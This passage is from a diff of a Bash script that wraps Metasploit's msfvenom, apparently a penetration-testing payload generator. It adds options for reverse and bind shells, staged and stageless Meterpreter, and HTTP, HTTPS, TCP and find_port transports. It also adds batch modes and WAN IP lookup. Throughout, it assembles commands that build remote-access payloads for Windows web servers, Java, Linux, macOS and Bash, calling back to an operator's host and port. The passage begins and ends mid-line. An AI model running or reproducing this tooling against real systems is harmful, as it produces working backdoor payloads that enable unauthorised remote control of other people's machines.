${RED}You're not using Linux${RESET}" >&2 + exit 3 +fi + ## msfvenom installed? if [[ ! -n "$(\which msfvenom)" ]]; then echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}Couldn't find msfvenom${RESET}" >&2 exit 3 fi -## Are we using Linux? (Sorry OSX users) -if [[ "$(\uname)" != "Linux" ]]; then - echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}You're not using Linux${RESET}" >&2 - exit 3 +## cURL/wget installed? +if [[ -n "$(\which curl)" || -n "$(\which wget)" ]]; then + ## Try and get external IP + WAN="" + [[ -n "$(\which curl)" ]] && CMD="\curl -s" || CMD="\wget -U 'curl' -qO-" + for url in 'http://ipinfo.io/ip' 'http://ifconfig.io/'; do + WAN=$(eval ${CMD} "${url}") + [[ -n "${WAN}" ]] && break + done + [[ "${VERBOSE}" == "true" && -z "${WAN}" ]] && echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}Couldn't get external WAN IP${RESET}" >&2 fi ## Is there a writeable path for us? 
@@ -160,23 +257,24 @@ if [[ ! -d "${OUTPATH}" ]]; then fi -## Get default values +## Get default values (before batch/loop) +[[ -z "${PORT}" ]] && PORT="443" IFACE=( $(\awk '/:/ {print $1}' /proc/net/dev | \sed 's_:__') ) IPs=( $(\ifconfig | \grep 'inet addr:' | \cut -d':' -f2 | \cut -d' ' -f1) ) # OSX -> \ifconfig | \grep inet | \grep -E '([[:digit:]]{1,2}.){4}' | \sed -e 's_[:|addr|inet]__g; s_^[ \t]*__' | \awk '{print $1}' -TYPEs=( asp aspx bash java linux osx perl php powershell python tomcat windows ) # Must always be a higher count than ${FORMATs} +TYPEs=( asp aspx bash java linux osx perl php powershell python tomcat windows ) # Due to how its coded, this must always be a higher array count than ${FORMATs} FORMATs=( sh jsp lin elf macho pl ps1 py war win exe ) ## Check user input ## Able to detect NIC interfaces? -if [[ "${IFACE}" == "" ]]; then +if [[ -z "${IFACE}" ]]; then echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}Couldn't find any network interfaces${RESET}" >&2 echo -e " ${YELLOW}[i]${RESET} Need to manually define an IP. ${YELLOW}${0} --ip ${RESET}" >&2 exit 2 fi ## Able to detect IP addresses? -if [[ "${IPs}" == "" ]]; then +if [[ -z "${IPs}" ]]; then echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}Couldn't discover IP addresses${RESET}. =(" >&2 echo -e " ${YELLOW}[i]${RESET} Need to manually define it. ${YELLOW}${0} --ip ${RESET}" >&2 exit 2 
@@ -184,23 +282,31 @@ fi ## (!!!Magic Alert!!!) Try to predict what's what with inputs... for x in $(\tr '[:upper:]' '[:lower:]' <<< "$@" ); do - if [[ "${x}" =~ ^--* ]]; then true # Long argument? (skip!) - elif [[ "${x}" == "verbose" || "${x}" == "v" ]]; then VERBOSE=true # Verbose? - elif [[ "${x}" == "all" || "${x}" == "batch" || "${x}" == "a" ]]; then BATCH=true # Batch mode? - elif [[ "${x}" == "loop" || "${x}" == "l" ]]; then LOOP=true # Loop mode? - elif [[ "${x}" == "staged" || "${x}" == "stage" || "${x}" == "small" ]]; then STAGE=true # Staged? - elif [[ "${x}" == "stage"*"less" || "${x}" == "single" || "${x}" == "inline" || "${x}" == "no"* || "${x}" == "full" ]]; then STAGE=false # Stageless? - elif [[ "${x}" == "cmd" || "${x}" == "shell" || "${x}" == "normal" ]]; then SHELL="shell" # Shell? - elif [[ "${x}" == "meterpreter" || "${x}" == "msf" || "${x}" == "meterp" ]]; then SHELL="meterpreter" # Meterpreter? - elif [[ "${x}" =~ ^-?[0-9]+$ && "${x}" -gt 1 && "${x}" -lt 65535 ]]; then PORT="${x}" # Port? - elif [[ "${x}" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]]; then IP="${x}" # IP? - elif [[ "${x}" == *.* ]]; then IP="${x}" # Domain/DNS? (weak detection & doesn't support hostname) + if [[ "${x}" =~ ^--* ]]; then true # Long argument? (skip!) + elif [[ "${x}" == "list" || "${x}" == "ls" || "${x}" == "options" || "${x}" == "show" || "${x}" == "help" ]]; then HELP=true # List types? (aka help screen) + elif [[ "${x}" == "verbose" || "${x}" == "v" ]]; then VERBOSE=true # Verbose? + elif [[ "${x}" == "all" || "${x}" == "batch" || "${x}" == "a" ]]; then BATCH=true # Batch mode? + elif [[ "${x}" == "loop" || "${x}" == "l" ]]; then LOOP=true # Loop mode? + elif [[ "${x}" == "cmd" || "${x}" == "shell" || "${x}" == "normal" ]]; then SHELL="shell" # Shell? + elif [[ "${x}" == "meterpreter" || "${x}" == "msf" || "${x}" == "meterp" ]]; then SHELL="meterpreter" # Meterpreter? 
+ elif [[ "${x}" == "bind" || "${x}" == "listen" ]]; then DIRECTION="bind" # Bind payload? + elif [[ "${x}" == "reverse" || "${x}" == "rev" ]]; then DIRECTION="reverse" # Reverse payload? (default) + elif [[ "${x}" == "staged" || "${x}" == "stager" || "${x}" == "stage" || "${x}" == "small" ]]; then STAGE=true # Staged? + elif [[ "${x}" == "stage"*"less" || "${x}" == "single" || "${x}" == "inline" || "${x}" == "no"* || "${x}" == "full" ]]; then STAGE=false # Stageless? + elif [[ "${x}" == "https" || "${x}" == "ssl" || "${x}" == "tls" ]]; then METHOD="https" # HTTPS payload? + elif [[ "${x}" == "http" || "${x}" == "www" ]]; then METHOD="http" # HTTP payload? + elif [[ "${x}" == "tcp" ]]; then METHOD="tcp" # TCP payload? (default) + elif [[ "${x}" == "find"* || "${x}" == "allport"* ]]; then METHOD="find_port" # Find_Port payload? + elif [[ "${x}" =~ ^-?[0-9]+$ && "${x}" -gt 1 && "${x}" -lt 65535 ]]; then PORT="${x}" # Port? + elif [[ "${x}" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]]; then IP="${x}" # IP? + elif [[ "${x}" == *.* ]]; then IP="${x}" # Domain/DNS? (weak detection & doesn't support hostname) + elif [[ "${x}" == "wan" && -n "${WAN}" ]]; then IP="${WAN}" # WAN interface? else known=false - for (( i=0; i<${#IFACE[@]}; ++i )); do [[ "${x}" == "${IFACE[${i}]}" ]] && IP="${IPs[${i}]}" && known=true && break; done # Interface? (rather than a an IP) - for (( i=0; i<${#TYPEs[@]}; ++i )); do [[ "${x}" == "${TYPEs[${i}]}" ]] && TYPE="${TYPEs[${i}]}" && known=true && break; done # Type? - for (( i=0; i<${#FORMATs[@]}; ++i )); do [[ "${x}" == "${FORMATs[${i}]}" ]] && TYPE="${FORMATs[${i}]}" && known=true && break; done # Type? (aka formats) - [[ "${known}" == false ]] && echo -e " ${YELLOW}[i]${RESET} Unable to detect value: ${RED}${x}${RESET}" && exit 1 # ...if we got this far, we failed. =( + for (( i=0; i<${#IFACE[@]}; ++i )); do [[ "${x}" == "${IFACE[${i}]}" ]] && IP="${IPs[${i}]}" && known=true && break; done # Interface? 
(rather than a an IP) + for (( i=0; i<${#TYPEs[@]}; ++i )); do [[ "${x}" == "${TYPEs[${i}]}" ]] && TYPE="${TYPEs[${i}]}" && known=true && break; done # Type? + for (( i=0; i<${#FORMATs[@]}; ++i )); do [[ "${x}" == "${FORMATs[${i}]}" ]] && TYPE="${FORMATs[${i}]}" && known=true && break; done # Type? (aka formats) + [[ "${known}" == false ]] && echo -e " ${YELLOW}[i]${RESET} Unable to detect value: ${RED}${x}${RESET}" && exit 1 # ...if we got this far, we failed. =( fi done @@ -211,6 +317,10 @@ while [[ "${#}" -gt 0 && ."${1}" == .-* ]]; do case "$(echo ${opt} | tr '[:upper:]' '[:lower:]')" in -|-- ) break 2;; + -p|--platform ) + TYPE="${1}"; shift;; + --platform=* ) + TYPE="${opt#*=}";; -t|--type ) TYPE="${1}"; shift;; --type=* ) @@ -226,15 +336,6 @@ while [[ "${#}" -gt 0 && ."${1}" == .-* ]]; do --port=* ) PORT="${opt#*=}";; - -s|--staged ) - STAGE=true;; - --stageless ) - STAGE=false;; - --stage ) - STAGE="${1}"; shift;; - --stage=* ) - STAGE="${opt#*=}";; - -m|--msf|--meterpreter ) SHELL="meterpreter";; -c|--cmd|--shell ) 
@@ -244,36 +345,87 @@ while [[ "${#}" -gt 0 && ."${1}" == .-* ]]; do --shell=* ) SHELL="${opt#*=}";; + -b|--bind|--listen ) + DIRECTION="bind";; + -r|--rev|--reverse ) + DIRECTION="reverse";; + --direction ) + DIRECTION="${1}"; shift;; + --direction=* ) + DIRECTION="${opt#*=}";; + + -s|--staged|--stager ) + STAGE=true;; + --stageless ) + STAGE=false;; + --stage ) + STAGE="${1}"; shift;; + --stage=* ) + STAGE="${opt#*=}";; + + -t|--tcp ) + METHOD="tcp";; + --http|--www ) + METHOD="http";; + --https|--ssl|--tls ) + METHOD="https";; + -f|--find|--all|--find_port|--find-port|--findport|--allports|--all-ports|--all_ports ) + METHOD="find_port";; + --method ) + METHOD="${1}"; shift;; + --method=* ) + METHOD="${opt#*=}";; + -a|--all|--batch ) BATCH=true;; -l|--loop ) LOOP=true;; - --verbose ) + -v|--verbose ) VERBOSE=true;; + -h|--help|-ls|--list|--options ) + HELP=true;; + *) echo -e " ${YELLOW}[i]${RESET} Invalid option: ${RED}${x}${RESET}" && exit 1;; esac done -## Set default values -[[ -z "${PORT}" ]] && PORT="443" - if [[ "${STAGE}" == "true" || "${STAGE}" == "staged" || "${STAGE}" == "stage" || "${STAGE}" == "small" ]]; then STAGE='staged'; _STAGE='/' -elif [[ "${STAGE}" == "false" || "${STAGE}" == "stage"*"less" || "${STAGE}" == "single" || "${STAGE}" == "inline" || "${STAGE}" == "no"* || "${STAGE}" == "full" ]]; then STAGE='stageless'; _STAGE='_'; fi -#else STAGE="_"; fi # <--- cant due to batch mode + +## Display help? 
+[[ "${HELP}" == true ]] && doHelp + + +## Check input if [[ "${SHELL}" == "shell" || "${SHELL}" == "cmd" || "${SHELL}" == "normal" ]]; then SHELL="shell" elif [[ "${SHELL}" == "meterpreter" || "${SHELL}" == "msf" || "${SHELL}" == "meterp" ]]; then SHELL="meterpreter"; fi -#else SHELL="meterpreter"; fi # <--- cant due to batch mode +#else SHELL="meterpreter"; fi # <--- cant due to batch mode (same with [[ -z "${SHELL}" ]]) + + if [[ "${DIRECTION}" == "reverse" || "${DIRECTION}" == "rev" ]]; then DIRECTION="reverse" +elif [[ "${DIRECTION}" == "bind" || "${DIRECTION}" == "listen" ]]; then DIRECTION="bind"; fi + + if [[ "${STAGE}" == "true" || "${STAGE}" == "staged" || "${STAGE}" == "stager" || "${STAGE}" == "stage" || "${STAGE}" == "small" ]]; then STAGE='staged'; _STAGE='/' +elif [[ "${STAGE}" == "false" || "${STAGE}" == "stage"*"less" || "${STAGE}" == "single" || "${STAGE}" == "inline" || "${STAGE}" == "no"* || "${STAGE}" == "full" ]]; then STAGE='stageless'; _STAGE='_'; fi + + if [[ "${METHOD}" == "tcp" ]]; then METHOD="tcp" +elif [[ "${METHOD}" == "http" || "${METHOD}" == "www" ]]; then METHOD="http" +elif [[ "${METHOD}" == "https" || "${METHOD}" == "tls" || "${METHOD}" == "ssl" ]]; then METHOD="https" +elif [[ "${METHOD}" == "find"* || "${METHOD}" == "all"* ]]; then METHOD="find_port"; fi ## Did user enter an interface instead of an IP address? for (( x=0; x<${#IFACE[@]}; ++x )); do [[ "${IP}" == "${IFACE[${x}]}" ]] && IP=${IPs[${x}]} && break; done +## WAN interface? +if [[ -n "${WAN}" && "${IP}" == "${WAN}" ]]; then + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} WAN IP: ${YELLOW}${WAN}${RESET} " +fi + ## Valued entered for IP address? Is it a valid IPv4 address? Else assume its a domain... 
if [[ "${IP}" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]]; then for (( i=1; i<${#BASH_REMATCH[@]}; ++i )); do (( ${BASH_REMATCH[${i}]} <= 255 )) || { echo -e " ${YELLOW}[i]${RESET} IP (${IP}) appears to be a ${RED}invalid IPv4 address${RESET} =(" >&2 && exit 3; } done -elif [[ "${IP}" != "" ]]; then +elif [[ -n "${IP}" ]]; then echo -e " ${YELLOW}[i]${RESET} ${IP} isn't a IPv4 address. ${YELLOW}Assuming its a domain name${RESET}..." DOMAIN=true fi 
@@ -284,22 +436,23 @@ if [[ "${PORT}" -lt 1 || "${PORT}" -gt 65535 ]]; then exit 3 fi + ## IP menu if [[ -n "${TYPE}" && -z "${IP}" ]]; then echo -e "\n ${YELLOW}[i]${RESET} Use which ${BLUE}interface${RESET}/${YELLOW}IP address${RESET}?:" I=0 for iface in "${IFACE[@]}"; do IPs[${I}]="$(\ifconfig ${iface} | \grep 'inet addr:' | \cut -d':' -f2 | \cut -d' ' -f1 | sort)" - [[ "${IPs[${I}]}" == "" ]] && IPs[${I}]="UNKNOWN" - + [[ -z "${IPs[${I}]}" ]] && IPs[${I}]="UNKNOWN" echo -e " ${YELLOW}[i]${RESET} ${GREEN}$[${I}+1]${RESET}.) ${BLUE}${iface}${RESET} - ${YELLOW}${IPs[${I}]}${RESET}" - I=$[${I}+1] done + [[ -n "${WAN}" ]] && I=$[${I}+1] && echo -e " ${YELLOW}[i]${RESET} ${GREEN}$[${I}]${RESET}.) ${BLUE}wan${RESET} - ${YELLOW}${WAN}${RESET}" _IP="" - while [[ "${_IP}" == "" ]]; do - echo -ne " ${YELLOW}[?]${RESET} ${GREEN}Select${RESET} 1-${I}, ${BLUE}interface${RESET} or ${YELLOW}IP address${RESET}"; read -p ": " INPUT - for (( x=0; x<${#IFACE[@]}; ++x )); do [[ "${INPUT}" == "${IFACE[${x}]}" ]] && _IP="${IPs[${x}]}"; done # Did user enter interface? + while [[ -z "${_IP}" ]]; do + echo -ne " ${YELLOW}[?]${RESET} Select ${GREEN}1-${I}${RESET}, ${BLUE}interface${RESET} or ${YELLOW}IP address${RESET}"; read -p ": " INPUT + for (( x=0; x<${I}; ++x )); do [[ "${INPUT}" == "${IFACE[${x}]}" ]] && _IP="${IPs[${x}]}"; done # Did user enter interface? + [[ -n "${WAN}" && "${INPUT}" == "${INPUT}" ]] && _IP="${WAN}" # Did user enter wan? [[ "${INPUT}" != *"."* && "${INPUT}" -ge 1 && "${INPUT}" -le "${I}" ]] && _IP="${IPs[${INPUT}-1]}" # Did user select number? #for ip in "${IPs[@]}"; do [[ "${INPUT}" == "${ip}" ]] && _IP="${ip}"; done # Did user enter a known IP? [[ "${INPUT}" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] && _IP="${INPUT}" # Did the user enter a IP address (doesn't valid it) 
@@ -309,237 +462,265 @@ if [[ -n "${TYPE}" && -z "${IP}" ]]; then fi -## Generate #1 (Looping) +## Generate #1 (Batch/Looping) ## Loop mode? if [[ "${LOOP}" == "true" ]]; then + echo -e " ${YELLOW}[i]${RESET} Loop Mode. ${BOLD}Creating one of each TYPE${RESET}, with default values" + [[ "${VERBOSE}" == "true" ]] && _VERBOSE="verbose" for (( i=0; i<${#TYPEs[@]}; ++i )); do - echo "" + echo "" # "${TYPEs[${i}]}" "${IP}" "${PORT}" "${_VERBOSE}" eval "${0}" "${TYPEs[${i}]}" "${IP}" "${PORT}" "${_VERBOSE}" echo "" done # for TYPEs[@] - TYPE="" -## Batch mode? elif [[ "${BATCH}" == "true" ]]; then + echo -e " ${YELLOW}[i]${RESET} Batch Mode. ${BOLD}Creating as many different combinations as possible${RESET}" + [[ "${VERBOSE}" == "true" ]] && _VERBOSE="verbose" for (( i=0; i<${#TYPEs[@]}; ++i )); do if [[ -z "${TYPE}" || "${TYPEs[${i}]}" == "${TYPE}" || "${FORMATs[${i}]}" == "${TYPE}" ]]; then type="${TYPEs[${i}]}" [[ -n "${TYPE}" && "${FORMATs[${i}]}" == "${TYPE}" ]] && type="${FORMATs[${i}]}" - for staged in staged stageless; do - if [[ -z "${STAGE}" || "${staged}" == "${STAGE}" ]]; then - for shell in meterpreter shell; do - if [[ -z "${SHELL}" || "${shell}" == "${SHELL}" ]]; then - [[ "${VERBOSE}" == "true" ]] && _VERBOSE="verbose" - echo "" - eval "${0}" "${type}" "${IP}" "${PORT}" "${shell}" "${staged}" "${_VERBOSE}" - echo "" - fi # "${shell}" == "${SHELL}" - done # for shell - fi # "${staged}" == "${STAGE}" - done # for staged + for shell in "meterpreter" "shell"; do + if [[ -z "${SHELL}" || "${shell}" == "${SHELL}" ]]; then + for direction in "reverse" "bind"; do + if [[ -z "${DIRECTION}" || "${direction}" == "${DIRECTION}" ]]; then + for staged in "staged" "stageless"; do + if [[ -z "${STAGE}" || "${staged}" == "${STAGE}" ]]; then + for method in "tcp" "http" "https" "find_port"; do + if [[ -z "${METHOD}" || "${method}" == "${METHOD}" ]]; then + echo ""  # "${type}" "${IP}" "${PORT}" "${direction}" "${staged}" "${method}" "${shell}" "${_VERBOSE}" + eval "${0}" 
"${type}" "${IP}" "${PORT}" "${direction}" "${staged}" "${method}" "${shell}" "${_VERBOSE}" + echo "" + fi # "${method}" == "${METHOD}" + done # for protocol + fi # "${staged}" == "${STAGE}" + done # for staged + fi # "${direction}" == "${DIRECTION}" + done # for direction + fi # "${shell}" == "${SHELL}" + done # for shell echo -e "\n" fi # "${TYPEs[${i}]}" == "${TYPE}" done # for TYPEs[@] - TYPE="" fi +## Set default values (after batch/loop) +[[ -z "${METHOD}" ]] && METHOD="tcp" +[[ -z "${DIRECTION}" ]] && DIRECTION="reverse" + ## Valid shell? -if [[ -n "${TYPE}" && "${SHELL}" != "shell" && "${SHELL}" != "meterpreter" && "${SHELL}" != "" ]]; then +if [[ -n "${TYPE}" && "${SHELL}" != "shell" && "${SHELL}" != "meterpreter" && -n "${SHELL}" ]]; then echo -e " ${YELLOW}[i]${RESET} SHELL (${SHELL}) is incorrect. Needs to be either ${YELLOW}shell${RESET} or ${YELLOW}meterpreter${RESET}" >&2 exit 3 fi ## Valid staged? -if [[ -n "${TYPE}" && "${STAGE}" != "staged" && "${STAGE}" != "stageless" && "${STAGE}" != "" ]]; then +if [[ -n "${TYPE}" && "${STAGE}" != "staged" && "${STAGE}" != "stageless" && -n "${STAGE}" ]]; then echo -e " ${YELLOW}[i]${RESET} STAGED (${STAGE}) is incorrect. Needs to be either ${YELLOW}staged${RESET} or ${YELLOW}stageless${RESET}" >&2 exit 3 -elif [[ -n "${TYPE}" && "${_STAGE}" != "/" && "${_STAGE}" != "_" && "${STAGE}" != "" ]]; then # "${STAGE}" != "" is correct +elif [[ -n "${TYPE}" && "${_STAGE}" != "/" && "${_STAGE}" != "_" && -n "${STAGE}" ]]; then # "${STAGE}" != "" is correct echo -e " ${YELLOW}[i]${RESET} ${RED}Something went wrong (Internally) with stage: ${_STAGE}.${RESET}" exit 2 fi +## If its not reverse (bind), the only option is tcp (not http/https/find_ports) +if [[ "${DIRECTION}" != "reverse" && "${METHOD}" != "tcp" ]]; then + echo -e " ${YELLOW}[i]${RESET} Unable to use ${METHOD} with ${DIRECTION}. 
Please ${YELLOW}switch to reverse${RESET}" >&2 + exit 3 +fi + -## Generate #2 (Main) +## Generate #2 (Single Payload) ## ASP if [[ "${TYPE}" == "asp" ]]; then - [[ "${SHELL}" == "" ]] && SHELL="meterpreter" - [[ "${STAGE}" == "" ]] && STAGE="staged" && _STAGE="/" - # stageless meterpreter - The EXE generator now has a max size of 2048 bytes, please fix the calling module + [[ -z "${SHELL}" ]] && SHELL="meterpreter" + [[ -z "${STAGE}" ]] && STAGE="staged" && _STAGE="/" + [[ "${METHOD}" == "find_port" ]] && METHOD="allports" + # Can't do: stageless meterpreter - The EXE generator now has a max size of 2048 bytes, please fix the calling module if [[ "${STAGE}" == "stageless" && "${SHELL}" == "meterpreter" ]]; then - echo -e " ${YELLOW}[i]${RESET} Unable to do STAGELESS METERPRETER ASP. Goes over Metasploit's ${RED}file size limit${RESET}. =(" >&2 - [[ "${VERBOSE}" != 'true' ]] && exit 5 + echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${SHELL} ASP. The result is over Metasploit's ${RED}file size limit${RESET}. =(" >&2 + #[[ "${VERBOSE}" != 'true' ]] && exit 5 # Force pass the warning? 
fi TYPE="windows" FILEEXT="asp" - PAYLOAD="${TYPE}/${SHELL}${_STAGE}reverse_tcp" - CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${STAGE}-${SHELL}-${PORT}.${FILEEXT}" - doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${STAGE}" "${VERBOSE}" + PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" + CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} > ${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" ## ASPX elif [[ "${TYPE}" == "aspx" ]]; then - [[ "${SHELL}" == "" ]] && SHELL="meterpreter" - [[ "${STAGE}" == "" ]] && STAGE="stageless" && _STAGE="_" + [[ -z "${SHELL}" ]] && SHELL="meterpreter" + [[ -z "${STAGE}" ]] && STAGE="staged" && _STAGE="/" + [[ "${METHOD}" == "find_port" ]] && METHOD="allports" + # Its able todo anything that you throw at it =). 
TYPE="windows" FILEEXT="aspx" - PAYLOAD="${TYPE}/${SHELL}${_STAGE}reverse_tcp" - CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${STAGE}-${SHELL}-${PORT}.${FILEEXT}" - doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${STAGE}" "${VERBOSE}" + PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" + CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} > ${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" ## Bash elif [[ "${TYPE}" == "bash" || "${TYPE}" == "sh" ]]; then - [[ "${SHELL}" == "" ]] && SHELL="shell" - [[ "${STAGE}" == "" ]] && STAGE="staged" && _STAGE="/" - # meterpreter or stageless - Invalid Payload Selected + [[ -z "${SHELL}" ]] && SHELL="shell" + [[ -z "${STAGE}" ]] && STAGE="staged" && _STAGE="/" + # Can't do: meterpreter or stageless - Invalid Payload Selected + # Can't do: bind option // http, https or find_port options if [[ "${STAGE}" == "stageless" ]]; then - echo -e " ${YELLOW}[i]${RESET} Unable to do STAGLESSS BASH. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 - [[ "${VERBOSE}" != 'true' ]] && exit 5 + echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE}. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 elif [[ "${SHELL}" == "meterpreter" ]]; then - echo -e " ${YELLOW}[i]${RESET} Unable to do METERPRETER BASH. There ${RED}isn't a BASH Meterpreter${RESET}...yet." >&2 - [[ "${VERBOSE}" != 'true' ]] && exit 5 + echo -e " ${YELLOW}[i]${RESET} Unable to do ${SHELL} Bash. There ${RED}isn't a Bash ${SHELL}${RESET}...yet?" >&2 + elif [[ "${DIRECTION}" != "reverse" ]]; then + echo -e " ${YELLOW}[i]${RESET} Unable to do ${DIRECTION}. 
There ${RED}isn't a ${DIRECTION} Bash${RESET}...yet?" >&2 fi TYPE="bash" FILEEXT="sh" - PAYLOAD="cmd/unix${_STAGE}reverse_bash" - CMD="msfvenom -p ${PAYLOAD} -f raw --platform unix -e generic/none -a cmd LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${STAGE}-${SHELL}-${PORT}.${FILEEXT}" - doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${STAGE}" "${VERBOSE}" + PAYLOAD="cmd/unix${_STAGE}${DIRECTION}_bash" + CMD="msfvenom -p ${PAYLOAD} -f raw --platform unix -e generic/none -a cmd LHOST=${IP} LPORT=${PORT} > ${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" ## Java elif [[ "${TYPE}" == "java" || "${TYPE}" == "jsp" ]]; then - [[ "${SHELL}" == "" ]] && SHELL="meterpreter" - [[ "${STAGE}" == "" ]] && STAGE="staged" && _STAGE="/" - # stageless meterpreter - Invalid Payload Selected + [[ -z "${SHELL}" ]] && SHELL="meterpreter" + [[ -z "${STAGE}" ]] && STAGE="staged" && _STAGE="/" + # Can't do: stageless meterpreter - Invalid Payload Selected if [[ "${STAGE}" == "stageless" && "${SHELL}" == "meterpreter" ]]; then - echo -e " ${YELLOW}[i]${RESET} Unable to do STAGELESS METERPRETER JAVA. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 - [[ "${VERBOSE}" != 'true' ]] && exit 5 + echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${SHELL} Java. There ${RED}isn't a option in Metasploit to allow it${RESET}. 
=(" >&2 fi TYPE="java" FILEEXT="jsp" - PAYLOAD="${TYPE}/${SHELL}${_STAGE}reverse_tcp" - CMD="msfvenom -p ${PAYLOAD} -f raw --platform ${TYPE} -e generic/none -a ${TYPE} LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${STAGE}-${SHELL}-${PORT}.${FILEEXT}" - doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${STAGE}" "${VERBOSE}" + PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" + CMD="msfvenom -p ${PAYLOAD} -f raw --platform ${TYPE} -e generic/none -a ${TYPE} LHOST=${IP} LPORT=${PORT} > ${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" ## Linux elif [[ "${TYPE}" == "linux" || "${TYPE}" == "lin" || "${TYPE}" == "elf" ]]; then - [[ "${SHELL}" == "" ]] && SHELL="meterpreter" - [[ "${STAGE}" == "" ]] && STAGE="staged" && _STAGE="/" - # stageless meterpreter - Invalid Payload Selected + [[ -z "${SHELL}" ]] && SHELL="shell" + [[ -z "${STAGE}" ]] && STAGE="staged" && _STAGE="/" + # Can't do: stageless meterpreter - Invalid Payload Selected if [[ "${STAGE}" == "stageless" && "${SHELL}" == "meterpreter" ]]; then - echo -e " ${YELLOW}[i]${RESET} Unable to do STAGELESS METERPRETER LINUX. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 - [[ "${VERBOSE}" != 'true' ]] && exit 5 + echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${SHELL} Linux. There ${RED}isn't a option in Metasploit to allow it${RESET}. 
=(" >&2 fi TYPE="linux" FILEEXT="elf" #bin - PAYLOAD="${TYPE}/x86/${SHELL}${_STAGE}reverse_tcp" - CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${STAGE}-${SHELL}-${PORT}.${FILEEXT}" - doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${STAGE}" "${VERBOSE}" + PAYLOAD="${TYPE}/x86/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" + CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} > ${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" ## OSX elif [[ "${TYPE}" == "osx" || "${TYPE}" == "macho" ]]; then - [[ "${SHELL}" == "" ]] && SHELL="shell" - [[ "${STAGE}" == "" ]] && STAGE="stageless" && _STAGE="_" - # meterpreter or stageless - Invalid Payload Selected - if [[ "${STAGE}" == "/" ]]; then - echo -e " ${YELLOW}[i]${RESET} Unable to do STAGLED OSX. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 - [[ "${VERBOSE}" != 'true' ]] && exit 5 + [[ -z "${SHELL}" ]] && SHELL="shell" + [[ -z "${STAGE}" ]] && STAGE="stageless" && _STAGE="_" + # Can't do: meterpreter or stageless - Invalid Payload Selected + if [[ 